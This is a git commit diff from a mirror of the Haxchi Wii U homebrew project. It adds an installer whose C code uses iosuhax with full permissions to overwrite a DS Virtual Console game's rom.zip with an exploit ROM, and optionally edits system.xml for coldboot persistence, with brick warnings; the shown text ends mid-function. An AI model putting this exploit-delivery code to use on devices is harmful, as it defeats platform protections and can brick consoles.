The-Homebrew-Cloud
/
haxchi
mirror of https://github.com/wiiu-env/haxchi.git
2
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

- Added the haxchi installer 

- Move roms creation into sub folder
- re-add support for other base games
This commit is contained in:
orboditilt 2019-08-14 22:06:31 +02:00
parent 2ff7a483fe
commit ba142e1ca0
34 changed files with 2308 additions and 57 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
.gitignore vendored
View File

@ -1,4 +1,2 @@
*.nds
*.zip
*.bin
defines.s
haxchi_installer/data/
haxchi_installer/src/zipList.h

33
Makefile
View File

@ -1,30 +1,7 @@
.PHONY := all code550.bin
ifeq ($(Windows_NT), 1)
ZIP = zip/zip.exe
else
ZIP = zip
endif
HAXCHI_S = haxchi.s
ROP_S = haxchi_rop.s
ROP_BIN = haxchi_rop.bin
all: clean brainage rom.zip
brainage: setup_brainage brainage.nds
setup_brainage:
@rm -f defines.s $(ROP_BIN) haxchi_rop_hook.bin
@cp -f brainage_defs.s defines.s
brainage.nds:
@armips $(ROP_S)
@armips $(HAXCHI_S)
@mv rom.nds brainage.nds
rom.zip:
$(ZIP) -JXjq9 rom.zip brainage.nds
all:
$(MAKE) -C "payload_generator"
$(MAKE) -C "haxchi_installer"
clean:
@rm -f *.zip *.nds defines.s
@echo "all cleaned up !"
$(MAKE) -C "payload_generator" clean
$(MAKE) -C "haxchi_installer" clean

19
README.md
View File

@ -1,22 +1,13 @@
# Haxchi
This is the continuation of Haxchi from FIX94 (initial PoC by smea).
# Usage
Put a payload `code550.bin` in the root of this project.
This payload should be statically linked to 0x18000000, and is called inside a thread.
Make sure to exit this thread via `OSExitThread(0);`, afterwards the rop switches automatically to the Mii Maker.
This repository consists of two parts:
An example payload which perform the kernel exploit can be found [here](https://github.com/wiiu-env/haxchi_payload).
- payload_generator, which will be used to create the target ROM which contain haxhi.
- haxchi_installer, is an installer which can be used to install haxchi onto your console.
# Notes
Currently this ONLY executes a given `code550.bin`, nothing usable for the end user. Only one game, no CFW, no coldboothax, nothing.
## Dependencies
armnips and zip
## Building
Checkout the individual READMEs of those two folder to get more information about building.
## credit
smea, plutoo, yellows8, naehrwert, derrek, FIX94, dimok and orboditilt.

16
haxchi_installer/.gitignore vendored Normal file
View File

@ -0,0 +1,16 @@
/fs/build
/installer/bin
/loader/build
/menu/build
/server/logs/*.txt
/build
/*.elf
/fs/*.elf
/loader/*.elf
/sd_loader/build
/sd_loader/*.elf
/udp_debug_reader/obj
/udp_debug_reader/GeckoLog.txt
*.cscope_file_list
*.rpx
*.cbp

138
haxchi_installer/Makefile Normal file
View File

@ -0,0 +1,138 @@
#-------------------------------------------------------------------------------
.SUFFIXES:
#-------------------------------------------------------------------------------
ifeq ($(strip $(DEVKITPRO)),)
$(error "Please set DEVKITPRO in your environment. export DEVKITPRO=<path to>/devkitpro")
endif
TOPDIR ?= $(CURDIR)
include $(DEVKITPRO)/wut/share/wut_rules
#-------------------------------------------------------------------------------
# TARGET is the name of the output
# BUILD is the directory where object files & intermediate files will be placed
# SOURCES is a list of directories containing source code
# DATA is a list of directories containing data files
# INCLUDES is a list of directories containing header files
#-------------------------------------------------------------------------------
TARGET := $(notdir $(CURDIR))
BUILD := build
SOURCES := src \
src/utils
DATA := data
INCLUDES := src
#-------------------------------------------------------------------------------
# options for code generation
#-------------------------------------------------------------------------------
CFLAGS := -g -Wall -O2 -ffunction-sections \
$(MACHDEP)
CFLAGS += $(INCLUDE) -D__WIIU__ -D__WUT__ -D_GNU_SOURCE
CXXFLAGS := $(CFLAGS)
ASFLAGS := -g $(ARCH)
LDFLAGS = -g $(ARCH) $(RPXSPECS) -Wl,-Map,$(notdir $*.map)
LIBS := -lxml2 -lz -liosuhax -lwut
#-------------------------------------------------------------------------------
# list of directories containing libraries, this must be the top level
# containing include and lib
#-------------------------------------------------------------------------------
LIBDIRS := $(PORTLIBS) $(WUT_ROOT)
#-------------------------------------------------------------------------------
# no real need to edit anything past this point unless you need to add additional
# rules for different file extensions
#-------------------------------------------------------------------------------
ifneq ($(BUILD),$(notdir $(CURDIR)))
#-------------------------------------------------------------------------------
export OUTPUT := $(CURDIR)/$(TARGET)
export TOPDIR := $(CURDIR)
export VPATH := $(foreach dir,$(SOURCES),$(CURDIR)/$(dir)) \
$(foreach dir,$(DATA),$(CURDIR)/$(dir))
export DEPSDIR := $(CURDIR)/$(BUILD)
CFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.c)))
CPPFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.cpp)))
SFILES := $(foreach dir,$(SOURCES),$(notdir $(wildcard $(dir)/*.s)))
BINFILES := $(foreach dir,$(DATA),$(notdir $(wildcard $(dir)/*.*)))
#-------------------------------------------------------------------------------
# use CXX for linking C++ projects, CC for standard C
#-------------------------------------------------------------------------------
ifeq ($(strip $(CPPFILES)),)
#-------------------------------------------------------------------------------
export LD := $(CC)
#-------------------------------------------------------------------------------
else
#-------------------------------------------------------------------------------
export LD := $(CXX)
#-------------------------------------------------------------------------------
endif
#-------------------------------------------------------------------------------
export OFILES_BIN := $(addsuffix .o,$(BINFILES))
export OFILES_SRC := $(CPPFILES:.cpp=.o) $(CFILES:.c=.o) $(SFILES:.s=.o)
export OFILES := $(OFILES_BIN) $(OFILES_SRC)
export HFILES_BIN := $(addsuffix .h,$(subst .,_,$(BINFILES)))
export INCLUDE := $(foreach dir,$(INCLUDES),-I$(CURDIR)/$(dir)) \
$(foreach dir,$(LIBDIRS),-I$(dir)/include) \
-I$(CURDIR)/$(BUILD) -I$(PORTLIBS_PATH)/ppc/include/libxml2
export LIBPATHS := $(foreach dir,$(LIBDIRS),-L$(dir)/lib)
.PHONY: $(BUILD) clean all
#-------------------------------------------------------------------------------
all: $(BUILD)
$(BUILD):
@[ -d $@ ] || mkdir -p $@
sh ./filelist.sh
@$(MAKE) --no-print-directory -C $(BUILD) -f $(CURDIR)/Makefile
#-------------------------------------------------------------------------------
clean:
@echo clean ...
@rm -fr $(BUILD) $(TARGET).rpx $(TARGET).elf
#-------------------------------------------------------------------------------
else
.PHONY: all
DEPENDS := $(OFILES:.o=.d)
#-------------------------------------------------------------------------------
# main targets
#-------------------------------------------------------------------------------
all : $(OUTPUT).rpx
$(OUTPUT).rpx : $(OUTPUT).elf
$(OUTPUT).elf : $(OFILES)
$(OFILES_SRC) : $(HFILES_BIN)
#-------------------------------------------------------------------------------
# you need a rule like this for each extension you use as binary data
#-------------------------------------------------------------------------------
%.bin.o %_bin.h : %.bin
@echo $(notdir $<)
@$(bin2o)
%.zip.o %_zip.h : %.zip
@echo $(notdir $<)
@$(bin2o)
-include $(DEPENDS)
#-------------------------------------------------------------------------------
endif
#-------------------------------------------------------------------------------

22
haxchi_installer/README.md Normal file
View File

@ -0,0 +1,22 @@
# Haxchi Installer
This installer can be used to install haxchi onto your console.
To install haxchi, you need a compatible title installed on your console.
## Building
Before you can build the haxchi installer, make sure to generate the haxchi-payloads using the payload-generator.
You also need [wut](https://github.com/devkitPro/wut/), [libiosuhax](https://github.com/wiiu-env/libiosuhax) and the following portlibs installed:
```
pacman -Syu ppc-zlib ppc-libxml2
```
Then compile the installer via
```
make
```
## Usage
Start the resulting `haxchi_installer.rpx` using the {homebrew launcher](https://github.com/wiiu-env/homebrew_launcher)
## credit
FIX94 and orboditilt.

60
haxchi_installer/filelist.sh Normal file
View File

@ -0,0 +1,60 @@
#! /bin/bash
#
# Automatic resource file list generation
# Created by Dimok
outFile="./src/ziplist.h"
count_old=$(cat $outFile 2>/dev/null | tr -d '\n\n' | sed 's/[^0-9]*\([0-9]*\).*/\1/')
count=0
if [[ $OSTYPE == darwin* ]];
then
for i in $(gfind ./data/ -maxdepth 1 -type f \( ! -printf "%f\n" \) | sort -f)
do
files[count]=$i
count=$((count+1))
done
else
for i in $(find ./data/ -maxdepth 1 -type f \( ! -printf "%f\n" \) | sort -f)
do
files[count]=$i
count=$((count+1))
done
fi
if [ "$count_old" != "$count" ] || [ ! -f $outFile ]
then
echo "Generating filelist.h for $count files." >&2
cat <<EOF > $outFile
/****************************************************************************
* This file is generated automatically.
* Includes $count files.
*
* NOTE:
* Any manual modification of this file will be overwriten by the generation.
****************************************************************************/
#ifndef _ZIPLIST_H_
#define _ZIPLIST_H_
EOF
for i in ${files[@]}
do
filename=${i%.*}
extension=${i##*.}
echo 'extern const unsigned char '$filename'_'$extension'[];' >> $outFile
echo 'extern const unsigned int '$filename'_'$extension'_size;' >> $outFile
echo '' >> $outFile
done
echo '' >> $outFile
echo '#endif' >> $outFile
fi

106
haxchi_installer/src/gameList.h Normal file
View File

@ -0,0 +1,106 @@
#ifndef _GAMELIST_H_
#define _GAMELIST_H_
#include "zipList.h"
typedef struct _gList_t {
uint32_t tid;
char name[64];
const unsigned char *romPtr;
const unsigned int *romSizePtr;
} gList_t;
gList_t GameList[] = {
{ 0x10179A00, "Kawashima: Motto Nou wo Kitaeru Otona no DS Training [JPN]", brainage_zip, &brainage_zip_size },
{ 0x10179B00, "Brain Age: Train Your Brain in Minutes a Day! [USA]", brainage_zip, &brainage_zip_size },
{ 0x10179C00, "Dr. Kawashima's Brain Training [PAL]", brainage_zip, &brainage_zip_size },
{ 0x10179D00, "Catch! Touch! Yoshi! [JPN]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
{ 0x10179E00, "Yoshi Touch & Go [USA]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
{ 0x10179F00, "Yoshi Touch & Go [PAL]", yoshitouchandgo_zip, &yoshitouchandgo_zip_size },
{ 0x10195600, "Mario Kart DS [JPN]", mariokartds_zip, &mariokartds_zip_size },
{ 0x10195700, "Mario Kart DS [USA]", mariokartds_zip, &mariokartds_zip_size },
{ 0x10195800, "Mario Kart DS [PAL]", mariokartds_zip, &mariokartds_zip_size },
{ 0x10195900, "New Super Mario Bros. [JPN]", newsmb_zip, &newsmb_zip_size },
{ 0x10195A00, "New Super Mario Bros. [USA]", newsmb_zip, &newsmb_zip_size },
{ 0x10195B00, "New Super Mario Bros. [PAL]", newsmb_eur_zip, &newsmb_eur_zip_size },
{ 0x10198800, "Yoshi's Island DS [JPN]", yoshids_zip, &yoshids_zip_size },
{ 0x10198900, "Yoshi's Island DS [USA]", yoshids_zip, &yoshids_zip_size },
{ 0x10198A00, "Yoshi's Island DS [PAL]", yoshids_zip, &yoshids_zip_size },
{ 0x10198B00, "Yawaraka Atama Juku [JPN]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
{ 0x10198C00, "Big Brain Academy [USA]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
{ 0x10198D00, "Big Brain Academy [PAL]", bigbrainacademy_zip, &bigbrainacademy_zip_size },
{ 0x101A1E00, "Sawaru: Made in Wario [JPN]", wwtouched_zip, &wwtouched_zip_size },
{ 0x101A1F00, "WarioWare: Touched! [USA]", wwtouched_zip, &wwtouched_zip_size },
{ 0x101A2000, "WarioWare: Touched! [PAL]", wwtouched_zip, &wwtouched_zip_size },
{ 0x101A2100, "Mario & Luigi RPG 2x2 [JPN]", partnersintime_zip, &partnersintime_zip_size },
{ 0x101A2200, "Mario & Luigi: Partners in Time [USA]", partnersintime_zip, &partnersintime_zip_size },
{ 0x101A2300, "Mario & Luigi: Partners in Time [PAL]", partnersintime_zip, &partnersintime_zip_size },
{ 0x101A5200, "Donkey Kong: Jungle Climber [JPN]", dkjclimber_zip, &dkjclimber_zip_size },
{ 0x101A5300, "DK: Jungle Climber [USA]", dkjclimber_zip, &dkjclimber_zip_size },
{ 0x101A5400, "Donkey Kong: Jungle Climber [PAL]", dkjclimber_zip, &dkjclimber_zip_size },
{ 0x101A5500, "Hoshi no Kirby: Sanjou! Dorocche Dan [JPN]", kirby_zip, &kirby_zip_size },
{ 0x101A5600, "Kirby: Squeak Squad [USA]", kirby_zip, &kirby_zip_size },
{ 0x101A5700, "Kirby: Mouse Attack [PAL]", kirby_zip, &kirby_zip_size },
{ 0x101ABD00, "Kaitou Wario the Seven [JPN]", masterofdisguise_zip, &masterofdisguise_zip_size },
{ 0x101ABE00, "Wario: Master of Disguise [USA]", masterofdisguise_zip, &masterofdisguise_zip_size },
{ 0x101ABF00, "Wario: Master of Disguise [PAL]", masterofdisguise_zip, &masterofdisguise_zip_size },
{ 0x101AC000, "Star Fox Command [JPN]", sfcommand_zip, &sfcommand_zip_size },
{ 0x101AC100, "Star Fox Command [USA]", sfcommand_zip, &sfcommand_zip_size },
{ 0x101AC200, "Star Fox Command [PAL]", sfcommand_zip, &sfcommand_zip_size },
{ 0x101B8800, "Touch! Kirby's Magic Paintbrush [JPN]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
{ 0x101B8900, "Kirby: Canvas Curse [USA]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
{ 0x101B8A00, "Kirby: Power Paintbrush [PAL]", kirbycanvascurse_zip, &kirbycanvascurse_zip_size },
{ 0x101B8B00, "Zelda no Densetsu: Daichi no Kiteki [JPN]", zeldast_zip, &zeldast_zip_size },
{ 0x101B8C00, "The Legend of Zelda: Spirit Tracks [USA]", zeldast_zip, &zeldast_zip_size },
{ 0x101B8D00, "The Legend of Zelda: Spirit Tracks [PAL]", zeldast_zip, &zeldast_zip_size },
{ 0x101C3300, "Super Mario 64 DS [JPN]", sm64ds_zip, &sm64ds_zip_size },
{ 0x101C3400, "Super Mario 64 DS [USA]", sm64ds_zip, &sm64ds_zip_size },
{ 0x101C3500, "Super Mario 64 DS [PAL]", sm64ds_zip, &sm64ds_zip_size },
{ 0x101C3600, "Zelda no Densetsu: Mugen no Sunadokei [JPN]", zeldaph_zip, &zeldaph_zip_size },
{ 0x101C3700, "The Legend of Zelda: Phantom Hourglass [USA]", zeldaph_zip, &zeldaph_zip_size },
{ 0x101C3800, "The Legend of Zelda: Phantom Hourglass [PAL]", zeldaph_zip, &zeldaph_zip_size },
{ 0x101C8600, "Atsumete! Kirby [JPN]", kirbymassattack_zip, &kirbymassattack_zip_size },
{ 0x101C8700, "Kirby Mass Attack [USA]", kirbymassattack_zip, &kirbymassattack_zip_size },
{ 0x101C8800, "Kirby Mass Attack [PAL]", kirbymassattack_zip, &kirbymassattack_zip_size },
{ 0x101CC200, "Pokemon Ranger [JPN]", pokemonranger_zip, &pokemonranger_zip_size },
{ 0x101CC300, "Pokemon Ranger [USA]", pokemonranger_zip, &pokemonranger_zip_size },
{ 0x101CC400, "Pokemon Ranger [PAL]", pokemonranger_zip, &pokemonranger_zip_size },
{ 0x101D1F00, "Oideyo Doubutsu no Mori [JPN]", animalcrossing_zip, &animalcrossing_zip_size },
{ 0x101D2000, "Animal Crossing: Wild World [USA]", animalcrossing_zip, &animalcrossing_zip_size },
{ 0x101D2100, "Animal Crossing: Wild World [PAL]", animalcrossing_zip, &animalcrossing_zip_size },
{ 0x101E0C00, "Pokemon Fushigi no Dungeon: Sora no Tankentai [JPN]", explorersofsky_zip, &explorersofsky_zip_size },
{ 0x101E0D00, "Pokemon Mystery Dungeon: Explorers of Sky [USA]", explorersofsky_zip, &explorersofsky_zip_size },
{ 0x101E0E00, "Pokemon Mystery Dungeon: Explorers of Sky [PAL]", explorersofsky_zip, &explorersofsky_zip_size },
{ 0x101E0F00, "Pokemon Ranger: Batonnage [JPN]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
{ 0x101E1000, "Pokemon Ranger: Shadows of Almia [USA]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
{ 0x101E1100, "Pokemon Ranger: Shadows of Almia [PAL]", shadowsofalmia_zip, &shadowsofalmia_zip_size },
{ 0x101E6F00, "Pokemon Ranger: Hikari no Kiseki [JPN]", guardiansigns_zip, &guardiansigns_zip_size },
{ 0x101E7000, "Pokemon Ranger: Guardian Signs [USA]", guardiansigns_zip, &guardiansigns_zip_size },
{ 0x101E7100, "Pokemon Ranger: Guardian Signs [PAL]", guardiansigns_zip, &guardiansigns_zip_size },
};
static const int GameListSize = sizeof(GameList) / sizeof(gList_t);
#endif

817
haxchi_installer/src/main.c Normal file
View File

@ -0,0 +1,817 @@
/*
* Copyright (C) 2016-2017 FIX94
*
* This software may be modified and distributed under the terms
* of the MIT license. See the LICENSE file for details.
*/
#include <string.h>
#include <malloc.h>
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <iosuhax.h>
#include <coreinit/mcp.h>
#include <vpad/input.h>
#include <whb/proc.h>
#include <whb/log.h>
#include <whb/log_console.h>
#include <coreinit/foreground.h>
#include <coreinit/systeminfo.h>
#include <proc_ui/procui.h>
#include <sysapp/launch.h>
#include <libxml/parser.h>
#include <libxml/tree.h>
#include <libxml/xpath.h>
#include "main.h"
#include "gameList.h"
#include "memory.h"
static const char *sdCardVolPath = "/vol/storage_sdcard_new";
#ifdef CB
static const char *systemXmlPath = "/vol/system/config/system.xml";
static const char *systemXmlPath2 = "/vol/system/config/system_new.xml";
static const char *syshaxXmlPath = "/vol/system/config/syshax.xml";
#endif
//just to be able to call async
void someFunc(void *arg)
{
(void)arg;
}
extern void OSForceFullRelaunch(void);
extern unsigned long long(*_SYSGetSystemApplicationTitleId)(int sysApp);
void println_noflip(int line, const char *msg)
{
WHBLogPrintf(msg);
WHBLogConsoleDraw();
}
void println(int line, const char *msg)
{
WHBLogPrintf(msg);
WHBLogConsoleDraw();
}
typedef struct _parsedList_t {
uint32_t tid;
char name[64];
char path[64];
uint8_t *romPtr;
uint32_t romSize;
} parsedList_t;
int fsa_read(int fsa_fd, int fd, void *buf, int len)
{
int done = 0;
uint8_t *buf_uint8_t = (uint8_t*)buf;
while(done < len)
{
size_t read_size = len - done;
int result = IOSUHAX_FSA_ReadFile(fsa_fd, buf_uint8_t + done, 0x01, read_size, fd, 0);
if(result < 0)
return result;
else
done += result;
}
return done;
}
int fsa_write(int fsa_fd, int fd, void *buf, int len)
{
int done = 0;
uint8_t *buf_uint8_t = (uint8_t*)buf;
while(done < len)
{
size_t write_size = len - done;
int result = IOSUHAX_FSA_WriteFile(fsa_fd, buf_uint8_t + done, 0x01, write_size, fd, 0);
if(result < 0)
return result;
else
done += result;
}
return done;
}
int availSort(const void *c1, const void *c2)
{
return strcmp(((parsedList_t*)c1)->name,((parsedList_t*)c2)->name);
}
void printhdr_noflip()
{
#ifdef CB
println_noflip(0,"CBHC v1.6 by FIX94");
#else
println_noflip(0,"Haxchi v2.5u2 by FIX94");
#endif
println_noflip(1,"Credits to smea, plutoo, yellows8, naehrwert, derrek and dimok");
}
static uint32_t
procSaveCallback(void *context) {
OSSavesDone_ReadyToRelease();
return 0;
}
int cleanupAndExitToHBL(){
memoryRelease();
WHBLogConsoleFree();
WHBProcShutdown();
return EXIT_SUCCESS;
}
int main(void)
{
OSEnableHomeButtonMenu(FALSE);
WHBProcInit();
WHBLogConsoleInit();
VPADInit();
memoryInitialize();
int mcp_handle = MCP_Open();
int count = MCP_TitleCount(mcp_handle);
int listSize = count*sizeof(MCPTitleListType);
MCPTitleListType *tList = (MCPTitleListType*)memalign(32, listSize); //cant be in MEMBucket
memset(tList, 0, listSize);
uint32_t recievedCount = count;
MCP_TitleList(mcp_handle, &recievedCount, tList, listSize);
MCP_Close(mcp_handle);
int gAvailCnt = 0;
parsedList_t *gAvail = (parsedList_t*)MEMBucket_alloc(recievedCount*sizeof(parsedList_t), 4);
memset(gAvail, 0, recievedCount*sizeof(parsedList_t));
int i, j;
for(i = 0; i < recievedCount; i++)
{
MCPTitleListType cListElm = tList[i];
if(memcmp(cListElm.indexedDevice,"mlc",4) != 0 || ((cListElm.titleId & 0xFFFFFFFF00000000L) != 0x0005000000000000L))
continue;
for(j = 0; j < GameListSize; j++)
{
if((cListElm.titleId & 0x00000000FFFFFFFFL) == GameList[j].tid)
{
gAvail[gAvailCnt].tid = GameList[j].tid;
memcpy(gAvail[gAvailCnt].name, GameList[j].name, 64);
memcpy(gAvail[gAvailCnt].path, cListElm.path, 64);
gAvail[gAvailCnt].romPtr = GameList[j].romPtr;
gAvail[gAvailCnt].romSize = *(GameList[j].romSizePtr);
gAvailCnt++;
break;
}
}
}
int vpadError = -1;
VPADStatus vpad;
if(gAvailCnt == 0)
{
printhdr_noflip();
println_noflip(2,"No games found on NAND! Make sure that you have your DS VC");
println_noflip(3,"game installed on NAND and have all of your USB Devices");
println_noflip(4,"disconnected while installing Haxchi as it can lead to issues.");
println_noflip(5,"Press any button to return to Homebrew Launcher.");
while(1)
{
usleep(25000);
VPADRead(0, &vpad, 1, &vpadError);
if(vpadError != 0)
continue;
if(vpad.trigger | vpad.hold)
break;
}
return cleanupAndExitToHBL();
}
qsort(gAvail,gAvailCnt,sizeof(parsedList_t),availSort);
uint32_t redraw = 1;
int32_t PosX = 0;
int32_t ScrollX = 0;
int32_t ListMax = gAvailCnt;
if( ListMax > 13 )
ListMax = 13;
uint32_t UpHeld = 0, triggerHeld = 0;
while(1)
{
usleep(25000);
VPADRead(0, &vpad, 1, &vpadError);
if(vpadError != 0)
continue;
if((vpad.trigger | vpad.hold) & VPAD_BUTTON_HOME)
{
return cleanupAndExitToHBL();
}
if( vpad.hold & VPAD_BUTTON_DOWN)
{
if(triggerHeld == 0 || triggerHeld > 10)
{
if( PosX + 1 >= ListMax )
{
if( PosX + 1 + ScrollX < gAvailCnt)
ScrollX++;
else {
PosX = 0;
ScrollX = 0;
}
} else {
PosX++;
}
redraw = 1;
}
triggerHeld++;
}
else
triggerHeld = 0;
if( vpad.hold & VPAD_BUTTON_UP )
{
if(UpHeld == 0 || UpHeld > 10)
{
if( PosX <= 0 )
{
if( ScrollX > 0 )
ScrollX--;
else {
PosX = ListMax - 1;
ScrollX = gAvailCnt - ListMax;
}
} else {
PosX--;
}
redraw = 1;
}
UpHeld++;
}
else
UpHeld = 0;
if( vpad.trigger & VPAD_BUTTON_A )
break;
if( redraw )
{
printhdr_noflip();
println_noflip(2,"Please select the game for the Installation from the list below.");
// Starting position.
int gamelist_y = 4;
for (i = 0; i < ListMax; ++i, gamelist_y++)
{
const parsedList_t *cur_gi = &gAvail[i+ScrollX];
char printStr[64];
sprintf(printStr,"%c %s", i == PosX ? '>' : ' ', cur_gi->name);
println_noflip(gamelist_y, printStr);
}
redraw = 0;
}
}
#ifdef CB
int action = 0;
#endif
const parsedList_t *SelectedGame = &gAvail[PosX + ScrollX];
println_noflip(2,"You have selected the following game:");
println_noflip(3,SelectedGame->name);
#ifdef CB
println_noflip(4,"Press A to install CBHC, B to remove coldboothax, HOME to Exit.");
println_noflip(5,"WARNING, INSTALLING CBHC CAN POTENTIALLY BRICK YOUR SYSTEM!");
println_noflip(6,"NEVER UNINSTALL OR MOVE THE SELECTED GAME OR YOUR WIIU IS DEAD!");
#else
println_noflip(4,"This will install Haxchi. To remove it you have to delete and");
println_noflip(5,"re-install the game. If you are sure press A, else press HOME.");
#endif
while(1)
{
usleep(25000);
VPADRead(0, &vpad, 1, &vpadError);
if(vpadError != 0)
continue;
//user aborted
if((vpad.trigger | vpad.hold) & VPAD_BUTTON_HOME)
{
return cleanupAndExitToHBL();
}
//lets go!
if(vpad.trigger & VPAD_BUTTON_A)
break;
#ifdef CB
if(vpad.trigger & VPAD_BUTTON_B)
{
action = 1;
break;
}
#endif
}
#ifdef CB
unsigned long long sysmenuIdUll = _SYSGetSystemApplicationTitleId(0);
char sysmenuId[20];
memset(sysmenuId, 0, 20);
sprintf(sysmenuId, "%08x%08x", (uint32_t)((sysmenuIdUll>>32)&0xFFFFFFFF),(uint32_t)(sysmenuIdUll&0xFFFFFFFF));
char new_title_id[20];
memset(new_title_id, 0, 20);
sprintf(new_title_id, "00050000%08x", SelectedGame->tid);
int line = 7;
#else
int line = 6;
#endif
int fsaFd = -1;
int sdMounted = 0;
int sdFd = -1, mlcFd = -1, slcFd = -1;
//open up iosuhax
int res = IOSUHAX_Open(NULL);
if(res < 0)
{
println(line++,"IOSUHAX_Open failed");
goto prgEnd;
}
//mount with full permissions
fsaFd = IOSUHAX_FSA_Open();
if(fsaFd < 0)
{
println(line++,"FSA could not be opened!");
goto prgEnd;
}
#ifdef CB
if(action == 1)
{
if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "rb", &slcFd) >= 0)
{
//read in system xml file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
size_t sysXmlSize = stats.size;
char *sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
memset(sysXmlBuf, 0, sysXmlSize+1);
fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "system.xml", "utf-8", 0);
//verify title id
int idFound = 0, idCorrect = 0;
xmlNode *root_element = xmlDocGetRootElement(doc);
xmlNode *cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "default_title_id", 17) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
if(memcmp(new_title_id, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
idFound++;
}
}
}
xmlFreeDoc(doc);
MEMBucket_free(sysXmlBuf);
if(idFound != 1)
println(line++,"default_title_id missing!");
else if(idCorrect != 1)
println(line++,"default_title_id not set to selected DS VC!");
else
{
if(IOSUHAX_FSA_OpenFile(fsaFd, syshaxXmlPath, "rb", &slcFd) >= 0)
{
//read in system xml file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, slcFd, &stats);
size_t sysXmlSize = stats.size;
sysXmlBuf = MEMBucket_alloc(sysXmlSize+1,4);
memset(sysXmlBuf, 0, sysXmlSize+1);
fsa_read(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
xmlDocPtr doc = xmlReadMemory(sysXmlBuf, sysXmlSize, "syshax.xml", "utf-8", 0);
//verify title id
int idFound = 0, idCorrect = 0;
xmlNode *root_element = xmlDocGetRootElement(doc);
xmlNode *cur_node = NULL;
for (cur_node = root_element->children; cur_node; cur_node = cur_node->next) {
if (cur_node->type == XML_ELEMENT_NODE) {
if(memcmp(cur_node->name, "default_title_id", 17) == 0)
{
if(xmlNodeGetContent(cur_node) == NULL || !strlen((char*)xmlNodeGetContent(cur_node))) continue;
if(memcmp(sysmenuId, (char*)xmlNodeGetContent(cur_node), 17) == 0) idCorrect++;
idFound++;
}
}
}
xmlFreeDoc(doc);
if(idFound != 1)
println(line++,"default_title_id missing!");
else if(idCorrect != 1)
println(line++,"default_title_id not set to System Menu!");
else
{
if(IOSUHAX_FSA_OpenFile(fsaFd, systemXmlPath, "wb", &slcFd) >= 0)
{
println(line++,"Restoring system.xml...");
fsa_write(fsaFd, slcFd, sysXmlBuf, sysXmlSize);
IOSUHAX_FSA_CloseFile(fsaFd, slcFd);
slcFd = -1;
println(line++,"Removed coldboothax!");
}
}
MEMBucket_free(sysXmlBuf);
}
else
println(line++,"syshax.xml backup not found, aborting!");
}
}
goto prgEnd;
}
#endif
int ret = IOSUHAX_FSA_Mount(fsaFd, "/dev/sdcard01", sdCardVolPath, 2, (void*)0, 0);
if(ret < 0)
{
println(line++,"Failed to mount SD!");
goto prgEnd;
}
else
sdMounted = 1;
char path[256];
sprintf(path,"%s/content/0010/rom.zip",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "rb", &mlcFd) < 0)
{
println(line++,"No already existing rom.zip found in the game!");
println(line++,"Make sure to re-install your DS title and try again.");
goto prgEnd;
}
else
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing rom.zip...");
fsa_write(fsaFd, mlcFd, SelectedGame->romPtr, SelectedGame->romSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
}
char sdHaxchiPath[256];
#ifdef CB
sprintf(sdHaxchiPath,"%s/cbhc",sdCardVolPath);
#else
sprintf(sdHaxchiPath,"%s/haxchi",sdCardVolPath);
#endif
char sdPath[256];
#ifndef CB
sprintf(sdPath,"%s/config.txt",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t cfgSize = stats.size;
uint8_t *cfgBuf = MEMBucket_alloc(cfgSize,4);
fsa_read(fsaFd, sdFd, cfgBuf, cfgSize);
IOSUHAX_FSA_CloseFile(fsaFd, sdFd);
sdFd = -1;
//write to nand
sprintf(path,"%s/content/config.txt",SelectedGame->path);
if(IOSUHAX_FSA_OpenFile(fsaFd, path, "wb", &mlcFd) >= 0)
{
println(line++,"Writing config.txt...");
fsa_write(fsaFd, mlcFd, cfgBuf, cfgSize);
IOSUHAX_FSA_CloseFile(fsaFd, mlcFd);
mlcFd = -1;
//make it readable by game
IOSUHAX_FSA_ChangeMode(fsaFd, path, 0x644);
}
MEMBucket_free(cfgBuf);
}
#endif
sprintf(sdPath,"%s/title.txt",sdHaxchiPath);
if(IOSUHAX_FSA_OpenFile(fsaFd, sdPath, "rb", &sdFd) >= 0)
{
//read in sd file
fileStat_s stats;
IOSUHAX_FSA_StatFile(fsaFd, sdFd, &stats);
size_t titleSize = stats.size;
xmlChar *titleBuf = MEMBucket_alloc(titleSize+1,4);
memset(titleBuf, 0, titleSize+1);
fsa_read(fsaFd, sdFd, titleBuf, titleSize);
